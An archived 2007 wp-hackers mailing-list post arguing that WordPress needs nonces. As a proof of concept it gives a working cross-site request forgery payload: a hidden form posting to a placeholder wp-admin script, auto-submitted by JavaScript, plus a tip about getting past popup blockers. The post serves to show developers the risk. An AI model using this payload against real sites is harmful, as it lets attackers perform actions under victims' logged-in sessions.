[wp-hackers] Any other way to do it? (or,
do we really need Nonces?)
Robert Deaton
false.hopes at gmail.com
Sat Mar 3 15:59:07 GMT 2007
On 3/3/07, Elliotte Harold <elharo at metalab.unc.edu> wrote:
> However I would lie to see a specific proof of concept of a JavaScript
> that submits a POST to a 3rd party site with authentication cookies intact.
<form name="bar" target="foo" method="post"
action="http://yoursite/wp-admin/bad-script.php" style="display:none">
<input type="hidden" name="var1" value="value1"/>
<input type="hidden" name="var2" value="value2"/>
<input type="hidden" name="var3" value="value3"/>
<input type="submit" name="weneedthistosubmit"
</form>
<script type="text/javascript">
document.forms['bar'].submit();
</script>
This particular incarnation is borrowed from earlier in the thread.
This one does work, however it will more likely than not trigger your
popup blockers. Test it and let it through, though, then remember that
all it takes is clicking a link and your popup blocker won't have a
thing to say.
The following are to help you test it. This sets a semi-random cookie.
http://lushlab.com/setcookie.php
This one var_dump()s $_POST and $_COOKIE
http://lushlab.com/test.php
--
--Robert Deaton
http://lushlab.com
More information about the wp-hackers
mailing list